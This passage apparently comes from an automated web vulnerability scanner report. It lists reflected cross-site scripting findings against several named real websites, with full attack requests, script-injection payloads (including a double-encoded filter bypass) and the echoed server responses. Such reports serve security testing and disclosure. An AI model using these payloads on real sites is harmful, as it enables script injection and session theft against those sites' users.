<a href="product_info.php?products_id=495&d9b33"><script>alert(1)</script>3a01f5b1865=1&currency=USD" title="Switch prices to US$">
...[SNIP]...

3.41. http://store.mandriva.com/product_info.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.mandriva.com
Path:   /product_info.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4974"><script>alert(1)</script>0d8cba98511d21e95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d4974\"><script>alert(1)</script>0d8cba98511d21e95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /product_info.php?products_id=495&action=add_pr/d4974"><script>alert(1)</script>0d8cba98511d21e95oduct&id%5B24%5D=88&products_id=495 HTTP/1.1
Host: store.mandriva.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.mandriva.com/product_info.php?products_id=495
Cookie: osCsid=baf29fe3beb0b63ae0b0d6dbef6b77e6; __utma=1.1215541348.1305469631.1305469631.1305469631.1; __utmb=1.2.10.1305469631; __utmc=1; __utmz=1.1305469631.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:43:06 GMT
Server: Apache-AdvancedExtranetServer/2.0.53 (Mandriva Linux/PREFORK-9.4.102mdk) mod_ssl/2.0.53 OpenSSL/0.9.7e PHP/4.3.10
X-Powered-By: PHP/4.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14039

<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
<link rel="canonical" href="/product_info.php?products_id=495&currency=EUR&language=english" />
<meta http-equiv="Content-Type" content="text/
...[SNIP]...
<a href="product_info.php?products_id=495&action=add_pr/d4974\"><script>alert(1)</script>0d8cba98511d21e95oduct&id=Array&currency=USD" title="Switch prices to US$">
...[SNIP]...

3.42. http://store.mandriva.com/product_info.php [products_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.mandriva.com
Path:   /product_info.php

Issue detail

The value of the products_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ef39"><script>alert(1)</script>4f532f5a012 was submitted in the products_id parameter. This input was echoed as 7ef39\"><script>alert(1)</script>4f532f5a012 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /product_info.php?products_id=4957ef39"><script>alert(1)</script>4f532f5a012 HTTP/1.1
Host: store.mandriva.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.mandriva.com/g/style/reset-fonts-grids.css
Cookie: osCsid=baf29fe3beb0b63ae0b0d6dbef6b77e6; __utma=1.1215541348.1305469631.1305469631.1305469631.1; __utmb=1.1.10.1305469631; __utmc=1; __utmz=1.1305469631.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:29:15 GMT
Server: Apache-AdvancedExtranetServer/2.0.53 (Mandriva Linux/PREFORK-9.4.102mdk) mod_ssl/2.0.53 OpenSSL/0.9.7e PHP/4.3.10
X-Powered-By: PHP/4.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14179

<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
<link rel="canonical" href="/product_info.php?products_id=4957&currency=EUR&language=english" />
<meta http-equiv="Content-Type" content="text
...[SNIP]...
<a href="product_info.php?products_id=4957ef39\"><script>alert(1)</script>4f532f5a012&currency=USD" title="Switch prices to US$">
...[SNIP]...

3.43. http://tvgids.upc.nl/scheduleApi/api/Channel/7J%7C6s%7C7G%7C7K%7C7L/events/NowAndNext.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tvgids.upc.nl
Path:   /scheduleApi/api/Channel/7J%7C6s%7C7G%7C7K%7C7L/events/NowAndNext.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 9b123<script>alert(1)</script>57ab9101622 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /scheduleApi/api/Channel/7J%7C6s%7C7G%7C7K%7C7L/events/NowAndNext.json?optionalProperties=Channel.url%2CChannel.logoIMG%2CEvent.url&order=startDateTime&batchSize=2&batch=0&callback=jsonp_16787609b123<script>alert(1)</script>57ab9101622 HTTP/1.1
Host: tvgids.upc.nl
Proxy-Connection: keep-alive
Referer: http://www.upc.nl/upclive/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 Apple
Date: Sun, 15 May 2011 15:42:16 GMT
Server: Apache
cache-control: private
cache-control: no-cache
cache-control: no-store
cache-control: must-revalidate
cache-control: max-age=0
expires: Thu, 05-May-2011 08:47:07 GMT
pragma: no-cache
content-length: 5350
Content-Type: application/json

jsonp_16787609b123<script>alert(1)</script>57ab9101622 ([[{"channel":{"id":"7J","_type":"Channel","name":"Nederland 1","logoIMG":"/media/pc/epg_upc/nl/channel_logos/ned1.gif","url":"/TV/Guide/Channel/Nederland+1/"},"endDateTime":"2011-05-15T16:00Z","_type
...[SNIP]...

3.44. http://webchat.rockliffe.com:9090/webchat/live [action parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://webchat.rockliffe.com:9090
Path:   /webchat/live

Issue detail

The value of the action request parameter is copied into the HTML document as plain text between tags. The payload f5b88<script>alert(1)</script>d45944dbf30 was submitted in the action parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webchat/live?action=isAvailablef5b88<script>alert(1)</script>d45944dbf30&workgroup=mailsite@workgroup.rockliffe.com HTTP/1.1
Host: webchat.rockliffe.com:9090
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=179611303.870644604.1305464308.1305464308.1305464308.1; __utmz=179611303.1305464308.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=179611303

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 217

<b>Fastpath Servlet</b><hr><br>Content Type: null<br>Content Encoding: UTF-8<p><b>Parameters:</b><ul><li>workgroup=mailsite@workgroup.rockliffe.com<li>action=isAvailablef5b88<script>alert(1)</script>d45944dbf30</ul>
...[SNIP]...

3.45. http://www.allvoip.gr/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.allvoip.gr
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 657e2--><script>alert(1)</script>c53ac8578f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?657e2--><script>alert(1)</script>c53ac8578f5=1 HTTP/1.1
Host: www.allvoip.gr
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://shops.oscommerce.com/directory/goto,34234

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:17:50 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: TEMPCOOKIE=CookieOn; expires=Sun, 15-May-2011 16:17:50 GMT
Set-Cookie: osCsid=nu0foff71uhnmo7bun7b31jg31; path=/; domain=allvoip.gr
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 123847

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="LTR" lang="el">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-7">
<meta name="title" http-e
...[SNIP]...
<a href="http://allvoip.gr/products_new.php?657e2--><script>alert(1)</script>c53ac8578f5=1&op=list&action=buy_now&products_id=580&osCsid=nu0foff71uhnmo7bun7b31jg31">
...[SNIP]...

3.46. http://www.ekko.ws/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ekko.ws
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ef5b"><script>alert(1)</script>0c5092af384 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9ef5b"><script>alert(1)</script>0c5092af384=1 HTTP/1.1
Host: www.ekko.ws
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://shops.oscommerce.com/directory/goto,41852

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:25:36 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1847


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="nl" xml:lang="nl">

<
...[SNIP]...
<a href="http://www.ekkows.0479228880.com/?9ef5b"><script>alert(1)</script>0c5092af384=1">
...[SNIP]...

3.47. http://www.ekko.ws/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ekko.ws
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 63ede<script>alert(1)</script>dcf44148064 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?63ede<script>alert(1)</script>dcf44148064=1 HTTP/1.1
Host: www.ekko.ws
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://shops.oscommerce.com/directory/goto,41852

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:25:43 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1841


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="nl" xml:lang="nl">

<
...[SNIP]...
</script>dcf44148064=1">http://www.ekkows.0479228880.com/?63ede<script>alert(1)</script>dcf44148064=1</a>
...[SNIP]...

3.48. http://www.ekko.ws/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ekko.ws
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b00e5"><script>alert(1)</script>ee8ef911b0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b00e5"><script>alert(1)</script>ee8ef911b0d=1 HTTP/1.1
Host: www.ekko.ws
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://shops.oscommerce.com/directory/goto,41852

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:25:39 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1847


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="nl" xml:lang="nl">

<
...[SNIP]...
<iframe src="http://www.ekkows.0479228880.com/?b00e5"><script>alert(1)</script>ee8ef911b0d=1" frameborder="0">
...[SNIP]...

3.49. http://www.ekko.ws/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ekko.ws
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cd28"><script>alert(1)</script>3166a746867 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2cd28"><script>alert(1)</script>3166a746867 HTTP/1.1
Host: www.ekko.ws
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:27:33 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1838


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="nl" xml:lang="nl">

<
...[SNIP]...
<iframe src="http://www.ekkows.0479228880.com/2cd28"><script>alert(1)</script>3166a746867" frameborder="0">
...[SNIP]...

3.50. http://www.ekko.ws/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ekko.ws
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 56495<script>alert(1)</script>e3a7c8ec4bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico56495<script>alert(1)</script>e3a7c8ec4bd HTTP/1.1
Host: www.ekko.ws
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:27:37 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1865


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="nl" xml:lang="nl">

<
...[SNIP]...
</script>e3a7c8ec4bd">http://www.ekkows.0479228880.com/favicon.ico56495<script>alert(1)</script>e3a7c8ec4bd</a>
...[SNIP]...

3.51. http://www.ekko.ws/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ekko.ws
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34900"><script>alert(1)</script>1964fc5b40d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico34900"><script>alert(1)</script>1964fc5b40d HTTP/1.1
Host: www.ekko.ws
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:27:28 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1871


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="nl" xml:lang="nl">

<
...[SNIP]...
<a href="http://www.ekkows.0479228880.com/favicon.ico34900"><script>alert(1)</script>1964fc5b40d">
...[SNIP]...

3.52. http://www.ekko.ws/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ekko.ws
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f6ae"><script>alert(1)</script>f51bcf7e764 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?5f6ae"><script>alert(1)</script>f51bcf7e764=1 HTTP/1.1
Host: www.ekko.ws
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:25:40 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1880


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="nl" xml:lang="nl">

<
...[SNIP]...
<a href="http://www.ekkows.0479228880.com/favicon.ico?5f6ae"><script>alert(1)</script>f51bcf7e764=1">
...[SNIP]...

3.53. http://www.ekko.ws/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ekko.ws
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bc71b<script>alert(1)</script>08cfc6baade was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?bc71b<script>alert(1)</script>08cfc6baade=1 HTTP/1.1
Host: www.ekko.ws
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:25:50 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1874


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="nl" xml:lang="nl">

<
...[SNIP]...
</script>08cfc6baade=1">http://www.ekkows.0479228880.com/favicon.ico?bc71b<script>alert(1)</script>08cfc6baade=1</a>
...[SNIP]...

3.54. http://www.ekko.ws/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ekko.ws
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71e3f"><script>alert(1)</script>bc79ec97915 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?71e3f"><script>alert(1)</script>bc79ec97915=1 HTTP/1.1
Host: www.ekko.ws
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:25:45 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1880


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="nl" xml:lang="nl">

<
...[SNIP]...
<iframe src="http://www.ekkows.0479228880.com/favicon.ico?71e3f"><script>alert(1)</script>bc79ec97915=1" frameborder="0">
...[SNIP]...

3.55. http://www.grics.qc.ca/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.grics.qc.ca
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24543%2522style%253d%2522x%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%252241aebbf9b7a was submitted in the REST URL parameter 1. This input was echoed as 24543"style="x:expr/**/ession(alert(1))"41aebbf9b7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.ico24543%2522style%253d%2522x%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%252241aebbf9b7a HTTP/1.1
Host: www.grics.qc.ca
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=x2wj5mnzn01z4mrxvxtfxe2t; __utmz=30083305.1305465382.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=30083305.861242077.1305465382.1305465382.1305465382.1; __utmc=30083305; __utmb=30083305.2.10.1305465382

Response (redirected)

HTTP/1.1 404 Not Found
Connection: Keep-Alive
Content-Length: 9121
Date: Sun, 15 May 2011 13:25:54 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
   <HEAD>
       <title>404 - Page non trouv..e</title>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
...[SNIP]...
<A href="mailto:Web@grics.qc.ca?subject=Page introuvable&amp;body=Ref.: favicon.ico24543"style="x:expr/**/ession(alert(1))"41aebbf9b7a">
...[SNIP]...

3.56. http://www.grics.qc.ca/fr/produits/eleve-jeune/gpi.aspx [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.grics.qc.ca
Path:   /fr/produits/eleve-jeune/gpi.aspx

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9976%2522style%253d%2522x%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%25229fc951766a6 was submitted in the REST URL parameter 4. This input was echoed as a9976"style="x:expr/**/ession(alert(1))"9fc951766a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /fr/produits/eleve-jeune/gpi.aspxa9976%2522style%253d%2522x%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%25229fc951766a6 HTTP/1.1
Host: www.grics.qc.ca
Proxy-Connection: keep-alive
Referer: http://www.grics.qc.ca/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=x2wj5mnzn01z4mrxvxtfxe2t; __utmz=30083305.1305465382.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=30083305.861242077.1305465382.1305465382.1305465382.1; __utmc=30083305; __utmb=30083305.1.10.1305465382

Response (redirected)

HTTP/1.1 404 Not Found
Connection: Keep-Alive
Content-Length: 9163
Date: Sun, 15 May 2011 13:25:31 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
   <HEAD>
